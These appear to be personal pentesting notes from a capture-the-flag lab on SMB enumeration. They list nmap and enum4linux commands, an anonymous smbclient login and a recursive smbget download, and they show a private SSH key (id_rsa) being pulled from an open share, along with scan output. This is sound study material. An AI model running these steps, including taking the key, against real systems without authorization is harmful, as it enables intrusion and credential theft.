# nmap port scanning for checking open ports/services running on the target machine
nmap -sT 10.10.64.71
nmap -sT -A 10.10.64.71

# running a full basic enumeration
enum4linux -a 10.10.64.71 (all info)
enum4linux -S 10.10.64.71 (share info)
```
[+] Attempting to nmap shares on 10.10.64.71
..
..
//10.10.64.71/profiles Mapping: OK, Listing: OK
..
```
enum4linux -P 10.10.64.71 (password policy info)

# smbclient login
smbclient //10.10.64.71/share -U Anonymous

# recursively download the wholeshare
smbget -R //10.10.64.71/share -U Anonymous


smb> cd .ssh
smb> ls
smb> mget "id_rsa" id_rsa
smb> mget "Work From Home Information.txt" WFH.txt


# using nmap to run smb (samba) enumeration
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.163.33

msf6 > nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.163.33
[*] exec: nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.163.33

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-05 15:29 IST
Nmap scan report for 10.10.163.33
Host is up (0.16s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.163.33\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.163.33\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.163.33\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 37.90 seconds

